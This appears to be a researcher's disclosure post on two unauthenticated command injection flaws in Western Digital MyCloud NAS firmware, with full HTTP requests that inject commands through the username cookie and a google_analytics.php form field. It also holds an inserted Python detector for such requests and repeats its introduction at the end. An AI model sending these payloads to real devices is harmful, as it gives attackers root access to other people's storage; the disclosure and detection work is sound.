Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL “/” (index.php), via the username value in the Cookie header. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close

cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.
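As an added defensive example (not code from the original post or from Western Digital), the following Python flags requests shaped like the two shown above: it parses a raw HTTP request, URL-decodes the Cookie values and the form body, reports shell metacharacters in fields the device passes toward a shell, and reports isAdmin/local_login cookies presented without a PHPSESSID. The embedded sample request is constructed from the first request in the write-up.

```python
import re
from urllib.parse import parse_qs, unquote

# Shell metacharacters that never belong in a username or a numeric option value.
SHELL_META = re.compile(r"[|;&`]|\$\(")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, header dict, body)."""
    head, _, body = raw.strip("\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()

def parse_cookies(header):
    """Cookie header -> dict of the first value per name (names are case-sensitive)."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name and name not in cookies:
            cookies[name] = value
    return cookies

def inspect(raw):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    method, path, headers, body = parse_request(raw)
    cookies = parse_cookies(headers.get("cookie", ""))
    findings = []
    # Values the device hands to a shell: the username cookie and form parameters.
    for name, value in cookies.items():
        if SHELL_META.search(unquote(value)):
            findings.append(f"shell metacharacters in cookie {name!r}")
    if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
        for name, values in parse_qs(body).items():  # parse_qs percent-decodes values
            if any(SHELL_META.search(v) for v in values):
                findings.append(f"shell metacharacters in form field {name!r} of {path}")
    # Privilege-claiming cookies with no server session cookie: forged login state.
    if ("isAdmin" in cookies or "local_login" in cookies) and "PHPSESSID" not in cookies:
        findings.append("isAdmin/local_login present without PHPSESSID")
    return findings

# Constructed sample modelled on the first request above (cookie injection, no PHPSESSID).
SAMPLE = (
    "GET / HTTP/1.1\nHost: wdmycloudex2\nConnection: close\n"
    "Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1\n"
)

if __name__ == "__main__":
    for finding in inspect(SAMPLE):
        print("ALERT:", finding)
```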

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVEs CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched CVE-2016-10108.

On 12/29/2016:

On 1/9/2017:

Hacking the Internet of Things

I’m sitting around the house on a rainy Saturday, hacking on IoT (Internet of Things) devices (that I own), and discovered these command injection vulnerabilities. 🙂

The first command injection vulnerability was blind. I started up Wireshark and filtered on icmp and saw the pings. I removed the PHPSESSID from the cookie and the exploit worked without authentication.

[Screenshot: blind-command-injection]

This command injection vulnerability was a little easier to find due to the run_cmd in the response. It was so gratifying to see “root” printed on the screen!


I removed the PHPSESSID from the cookie and resubmitted the request from another computer and got unauthenticated command injection.


I’ve disclosed these vulnerabilities to the manufacturer and will provide an update with full disclosure after they have had time to fix the issues.